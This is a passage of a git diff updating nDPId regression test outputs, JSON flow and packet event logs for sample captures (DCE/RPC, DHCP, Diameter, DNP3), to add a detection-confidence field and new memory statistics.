 00607{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1602860710063,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":174,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":174,"pkt_l4_len":140,"ts_msec":1602860710063,"pkt":"ABwGCybtAA7wSJ4FCABFAACgAAgAAB4RGNbAqAEUwKgBC8AKiJQAjEB6BAAgABAAAAAAAKDel2zREYJxAGQBDQAqAgCg3pds0RGCcQCgJELffYDI+0MAABAQgAAADvBIngUAAAAAAQAAAAAAAAAEAP\/\/\/\/80AAAAAACgAAAAIAAAAKAAAAAAAAAAIAAAAAESABwBAAAACfGlMMdfbUe2f4BzQ53qrQACAAAAAgAA"}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1602860710071,"flow_last_seen":1602860710071,"flow_idle_time":180000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":132,"midstream":0,"ts_msec":1602860710071,"l3_proto":"ip4","src_ip":"192.168.1.11","dst_ip":"192.168.1.20","src_port":49154,"dst_port":49162,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00607{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1602860710071,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":174,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":174,"pkt_l4_len":140,"ts_msec":1602860710071,"pkt":"AA7wSJ4FABwGCybtCABFAACgAYEAAB4RF13AqAELwKgBFMACwAoAjHUlBAIKAAAAAADeoAAAbJcR0YJxAGQBDQAq3qAAAmyXEdGCcQCgJELffUP7yIAAABAQgAAADvBIngUAJ7vVAAAAAQAAAAAABP\/\/\/\/8ANAAAAAAAAAAAAAAAIAAAAKAAAAAAAAAAIIESABwBAAAACfGlMMdfbUe2f4BzQ53qrQACAAAACAAA"}
-00608{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1602860710071,"flow_last_seen":1602860710071,"flow_idle_time":180000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":132,"midstream":0,"ts_msec":1602860710071,"l3_proto":"ip4","src_ip":"192.168.1.11","dst_ip":"192.168.1.20","src_port":49154,"dst_port":49162,"l4_proto":"udp","ndpi": {"proto":"DCE_RPC","breed":"Acceptable","category":"RPC"}}
+00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1602860710071,"flow_last_seen":1602860710071,"flow_idle_time":180000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":132,"midstream":0,"ts_msec":1602860710071,"l3_proto":"ip4","src_ip":"192.168.1.11","dst_ip":"192.168.1.20","src_port":49154,"dst_port":49162,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"RPC","breed":"Acceptable","category":"RPC"}}
 00607{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1602860710071,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":174,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":174,"pkt_l4_len":140,"ts_msec":1602860710071,"pkt":"AA7wSJ4FABwGCybtCABFAACgAYEAAB4RF13AqAELwKgBFMACwAoAjHUlBAIKAAAAAADeoAAAbJcR0YJxAGQBDQAq3qAAAmyXEdGCcQCgJELffUP7yIAAABAQgAAADvBIngUAJ7vVAAAAAQAAAAAABP\/\/\/\/8ANAAAAAAAAAAAAAAAIAAAAKAAAAAAAAAAIIESABwBAAAACfGlMMdfbUe2f4BzQ53qrQACAAAACAAA"}
-00647{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":16,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1602860710071,"flow_last_seen":1602860710071,"flow_idle_time":180000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":264,"flow_avg_l4_payload_len":132,"midstream":0,"ts_msec":1602860710071,"l3_proto":"ip4","src_ip":"192.168.1.11","dst_ip":"192.168.1.20","src_port":49154,"dst_port":49162,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DCE_RPC","breed":"Acceptable","category":"RPC"}}
-00648{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":16,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1602860709993,"flow_last_seen":1602860710062,"flow_idle_time":180000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":804,"flow_tot_l4_payload_len":2212,"flow_avg_l4_payload_len":368,"midstream":0,"ts_msec":1602860710071,"l3_proto":"ip4","src_ip":"192.168.1.20","dst_ip":"192.168.1.11","src_port":49161,"dst_port":49155,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DCE_RPC","breed":"Acceptable","category":"RPC"}}
-00648{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":16,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1602860709979,"flow_last_seen":1602860710032,"flow_idle_time":180000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":953,"flow_tot_l4_payload_len":3454,"flow_avg_l4_payload_len":575,"midstream":0,"ts_msec":1602860710071,"l3_proto":"ip4","src_ip":"192.168.1.11","dst_ip":"192.168.1.20","src_port":49155,"dst_port":34964,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DCE_RPC","breed":"Acceptable","category":"RPC"}}
-00647{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":16,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1602860710063,"flow_last_seen":1602860710063,"flow_idle_time":180000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":264,"flow_avg_l4_payload_len":132,"midstream":0,"ts_msec":1602860710071,"l3_proto":"ip4","src_ip":"192.168.1.20","dst_ip":"192.168.1.11","src_port":49162,"dst_port":34964,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DCE_RPC","breed":"Acceptable","category":"RPC"}}
+00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":16,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1602860710071,"flow_last_seen":1602860710071,"flow_idle_time":180000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":264,"flow_avg_l4_payload_len":132,"midstream":0,"ts_msec":1602860710071,"l3_proto":"ip4","src_ip":"192.168.1.11","dst_ip":"192.168.1.20","src_port":49154,"dst_port":49162,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RPC","breed":"Acceptable","category":"RPC"}}
+00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":16,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1602860709993,"flow_last_seen":1602860710062,"flow_idle_time":180000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":804,"flow_tot_l4_payload_len":2212,"flow_avg_l4_payload_len":368,"midstream":0,"ts_msec":1602860710071,"l3_proto":"ip4","src_ip":"192.168.1.20","dst_ip":"192.168.1.11","src_port":49161,"dst_port":49155,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RPC","breed":"Acceptable","category":"RPC"}}
+00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":16,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1602860709979,"flow_last_seen":1602860710032,"flow_idle_time":180000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":953,"flow_tot_l4_payload_len":3454,"flow_avg_l4_payload_len":575,"midstream":0,"ts_msec":1602860710071,"l3_proto":"ip4","src_ip":"192.168.1.11","dst_ip":"192.168.1.20","src_port":49155,"dst_port":34964,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RPC","breed":"Acceptable","category":"RPC"}}
+00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":16,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1602860710063,"flow_last_seen":1602860710063,"flow_idle_time":180000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":264,"flow_avg_l4_payload_len":132,"midstream":0,"ts_msec":1602860710071,"l3_proto":"ip4","src_ip":"192.168.1.20","dst_ip":"192.168.1.11","src_port":49162,"dst_port":34964,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RPC","breed":"Acceptable","category":"RPC"}}
 00155{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":16,"source":"dcerpc.pcap","alias":"nDPId-test","total-events-serialized":24}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 16/16
@@ -30,9 +30,9 @@
 ~~ total active/idle flows...: 4/4
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4598893 bytes
-~~ total memory freed........: 4598893 bytes
-~~ total allocations/frees...: 99578/99578
+~~ total memory allocated....: 4682862 bytes
+~~ total memory freed........: 4682862 bytes
+~~ total allocations/frees...: 101168/101168
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 160 chars
 ~~ json string max len.......: 1725 chars
diff --git a/test/results/dhcp-fuzz.pcapng.out b/test/results/dhcp-fuzz.pcapng.out
index 543484896..a80e8f91e 100644
--- a/test/results/dhcp-fuzz.pcapng.out
+++ b/test/results/dhcp-fuzz.pcapng.out
@@ -1,7 +1,7 @@
 00443{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"dhcp-fuzz.pcapng","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"dhcp-fuzz.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1268519154926,"flow_last_seen":1268519154926,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1268519154926,"l3_proto":"ip4","src_ip":"192.168.155.104","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00845{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dhcp-fuzz.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1268519154926,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"ts_msec":1268519154926,"pkt":"\/\/\/\/\/\/\/\/AB8p2i15CABFAAFIfVQAAIAR+kDAqJto\/\/\/\/\/wBEAEMBNNQyAQEGAMl5uWAAAAAAwKgBaAAAAAAAAAAAAAAAAAAfKdoteQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1wAAAAAAAFMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAZQAAAAAAAAAAAABjglNjNQFqPQcBAB8p2i15DAdNSzAzODYyPDFNU0ZUIDUuMDcMAQ8DBiwuLx8h+Sv8KwPcAQD\/AAAAACUAAAAA"}
-00670{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1,"source":"dhcp-fuzz.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1268519154926,"flow_last_seen":1268519154926,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1268519154926,"l3_proto":"ip4","src_ip":"192.168.155.104","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"","fingerprint":"","class_ident":""}}
+00706{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1,"source":"dhcp-fuzz.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1268519154926,"flow_last_seen":1268519154926,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1268519154926,"l3_proto":"ip4","src_ip":"192.168.155.104","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"1":"Match by port"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"","fingerprint":"","class_ident":""}}
 00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"dhcp-fuzz.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1268519154926,"flow_last_seen":1268519154926,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1268519154926,"l3_proto":"ip4","src_ip":"192.168.155.104","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00158{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1,"source":"dhcp-fuzz.pcapng","alias":"nDPId-test","total-events-serialized":6}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
@@ -12,9 +12,9 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4594858 bytes
-~~ total memory freed........: 4594858 bytes
-~~ total allocations/frees...: 99554/99554
+~~ total memory allocated....: 4679811 bytes
+~~ total memory freed........: 4679811 bytes
+~~ total allocations/frees...: 101144/101144
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 163 chars
 ~~ json string max len.......: 850 chars
diff --git a/test/results/diameter.pcap.out b/test/results/diameter.pcap.out
index 4ae19d746..cf3b4a535 100644
--- a/test/results/diameter.pcap.out
+++ b/test/results/diameter.pcap.out
@@ -1,10 +1,10 @@
 00440{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"diameter.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"diameter.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1263278878271,"flow_last_seen":1263278878271,"flow_idle_time":7440000,"flow_min_l4_payload_len":344,"flow_max_l4_payload_len":344,"flow_tot_l4_payload_len":344,"flow_avg_l4_payload_len":344,"midstream":1,"ts_msec":1263278878271,"l3_proto":"ip4","src_ip":"10.201.9.245","dst_ip":"10.201.9.11","src_port":50957,"dst_port":3868,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00905{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"diameter.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1263278878271,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":398,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":398,"pkt_l4_len":364,"ts_msec":1263278878271,"pkt":"ABpk3ZWLACYYlIbACABFAAGABtlAAIAGAAAKyQn1CskJC8cNDxz34fq2+LwvkFAY+gQqBAAAAQABWIAAARAAAAAEAupJMCbwAAMAAAEHQAAAHW54bDthcGk7MTI2MzI3ODg3ODE0NwAAAAAAAc1AAAAUQ29tdmVyc2UuRENJAAABAkAAAAwAAAAEAAABCEAAABlueGwxLm5ldHhjZWxsLmNvbQAAAAAAAShAAAAUbmV0eGNlbGwuY29tAAABn0AAAAwAAAAAAAABJUAAABlkZ3UyLmNvbXZlcnNlLmNvbQAAAAAAARtAAAAUY29tdmVyc2UuY29tAAAAN0AAAAzO9pmeAAABu0AAACgAAAG8QAAAFDkxOTA4MDAwMDAxNgAAAcJAAAAMAAAAAAAAAbhAAAAkAAABuUAAAAwAAAACAAABukAAAA1kYmlsbAAAAAAAAaBAAAAMAAAAAQAAAbVAAAA0AAABnUAAACwAAAG9QAAAGAAAAb9AAAAQAAAAAAAAAAIAAAGpQAAADAAAAWQ="}
-00613{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"diameter.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1263278878271,"flow_last_seen":1263278878271,"flow_idle_time":7440000,"flow_min_l4_payload_len":344,"flow_max_l4_payload_len":344,"flow_tot_l4_payload_len":344,"flow_avg_l4_payload_len":344,"midstream":1,"ts_msec":1263278878271,"l3_proto":"ip4","src_ip":"10.201.9.245","dst_ip":"10.201.9.11","src_port":50957,"dst_port":3868,"l4_proto":"tcp","ndpi": {"proto":"Diameter","breed":"Acceptable","category":"Network"}}
+00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"diameter.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1263278878271,"flow_last_seen":1263278878271,"flow_idle_time":7440000,"flow_min_l4_payload_len":344,"flow_max_l4_payload_len":344,"flow_tot_l4_payload_len":344,"flow_avg_l4_payload_len":344,"midstream":1,"ts_msec":1263278878271,"l3_proto":"ip4","src_ip":"10.201.9.245","dst_ip":"10.201.9.11","src_port":50957,"dst_port":3868,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Diameter","breed":"Acceptable","category":"Network"}}
 00761{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"diameter.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1263278878292,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":290,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":290,"pkt_l4_len":256,"ts_msec":1263278878292,"pkt":"ACYYlIbAABpk3ZWLCABFAAEUlYlAAEAGe8kKyQkLCskJ9Q8cxw34vC+Q9+H8DlAYGSCUIQAAAQAA7EAAARAAAAAEAupJMCbwAAMAAAEHQAAAHW54bDthcGk7MTI2MzI3ODg3ODE0NwAAAAAAAQxAAAAMAAAH0QAAAQhAAAAaZHNsdTEuY29tdmVyc2UuY29tAAAAAAEoQAAAFGNvbXZlcnNlLmNvbQAAAQJAAAAMAAAABAAAAaBAAAAMAAAAAQAAAZ9AAAAMAAAAAAAAARZAAAAMAABBbQAAADdAAAAMzvaZ5QAAAcBAAAAMAAAABQAAAa9AAAA0AAABnUAAACwAAAG9QAAAGAAAAb9AAAAQAAAAAAAAAAIAAAGpQAAADAAAAWQ="}
 00926{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"diameter.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1263278878336,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":414,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":414,"pkt_l4_len":380,"ts_msec":1263278878336,"pkt":"ABpk3ZWLACYYlIbACABFAAGQBtpAAIAGAAAKyQn1CskJC8cNDxz34fwO+LwwfFAY+RgqFAAAAQABaIAAARAAAAAEAupJMSbwAAUAAAEHQAAAHW54bDthcGk7MTI2MzI3ODg3ODE0NwAAAAAAAc1AAAAUQ29tdmVyc2UuRENJAAABAkAAAAwAAAAEAAABCEAAABlueGwxLm5ldHhjZWxsLmNvbQAAAAAAAShAAAAUbmV0eGNlbGwuY29tAAABn0AAAAwAAAABAAABJUAAABlkZ3UyLmNvbXZlcnNlLmNvbQAAAAAAARtAAAAUY29tdmVyc2UuY29tAAAAN0AAAAzO9pmeAAABu0AAACgAAAG8QAAAFDkxOTA4MDAwMDAxNgAAAcJAAAAMAAAAAAAAAaBAAAAMAAAAAgAAAbVAAAA0AAABnUAAACwAAAG9QAAAGAAAAb9AAAAQAAAAAAAAAAIAAAGpQAAADAAAAWQAAAG+QAAANAAAAZ1AAAAsAAABvUAAABgAAAG\/QAAAEAAAAAAAAAABAAABqUAAAAwAAAFk"}
-00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"diameter.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1263278878271,"flow_last_seen":1263278878357,"flow_idle_time":7440000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":360,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":276,"midstream":1,"ts_msec":1263278878357,"l3_proto":"ip4","src_ip":"10.201.9.245","dst_ip":"10.201.9.11","src_port":50957,"dst_port":3868,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Diameter","breed":"Acceptable","category":"Network"}}
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"diameter.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1263278878271,"flow_last_seen":1263278878357,"flow_idle_time":7440000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":360,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":276,"midstream":1,"ts_msec":1263278878357,"l3_proto":"ip4","src_ip":"10.201.9.245","dst_ip":"10.201.9.11","src_port":50957,"dst_port":3868,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Diameter","breed":"Acceptable","category":"Network"}}
 00155{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":6,"source":"diameter.pcap","alias":"nDPId-test","total-events-serialized":8}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 6/6
@@ -14,9 +14,9 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4595003 bytes
-~~ total memory freed........: 4595003 bytes
-~~ total allocations/frees...: 99559/99559
+~~ total memory allocated....: 4679956 bytes
+~~ total memory freed........: 4679956 bytes
+~~ total allocations/frees...: 101149/101149
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 160 chars
 ~~ json string max len.......: 931 chars
diff --git a/test/results/dlt_ppp.pcap.out b/test/results/dlt_ppp.pcap.out
index a63b7542d..7946fdc5d 100644
--- a/test/results/dlt_ppp.pcap.out
+++ b/test/results/dlt_ppp.pcap.out
@@ -10,9 +10,9 @@
 ~~ total active/idle flows...: 0/0
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4593629 bytes
-~~ total memory freed........: 4593629 bytes
-~~ total allocations/frees...: 99550/99550
+~~ total memory allocated....: 4678910 bytes
+~~ total memory freed........: 4678910 bytes
+~~ total allocations/frees...: 101140/101140
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 159 chars
 ~~ json string max len.......: 1942 chars
diff --git a/test/results/dnp3.pcap.out b/test/results/dnp3.pcap.out
index 7ad101091..407e968ac 100644
--- a/test/results/dnp3.pcap.out
+++ b/test/results/dnp3.pcap.out
@@ -3,54 +3,54 @@
 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1097501938503,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1097501938503,"pkt":"AAKzznBRAFAEk3BnCABFAAAwTFlAAIAGmmQKAAAICgAAAwrlTiBVHBrSAAAAAHAC\/\/+mIQAAAgQFtAEBBAI="}
 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1097501938503,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1097501938503,"pkt":"AAKzznBRAFAEk3BnCABFAAAwTFlAAIAGmmQKAAAICgAAAwrlTiBVHBrSAAAAAHAC\/\/+mIQAAAgQFtAEBBAI="}
 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1097501938503,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1097501938503,"pkt":"AAKzznBRAFAEk3BnCABFAAAwTFlAAIAGmmQKAAAICgAAAwrlTiBVHBrSAAAAAHAC\/\/+mIQAAAgQFtAEBBAI="}
-00596{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"dnp3.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1097501938503,"flow_last_seen":1097501938504,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":17,"flow_tot_l4_payload_len":17,"flow_avg_l4_payload_len":1,"midstream":0,"ts_msec":1097501938504,"l3_proto":"ip4","src_ip":"10.0.0.8","dst_ip":"10.0.0.3","src_port":2789,"dst_port":20000,"l4_proto":"tcp","ndpi": {"proto":"DNP3","breed":"Acceptable","category":"IoT-Scada"}}
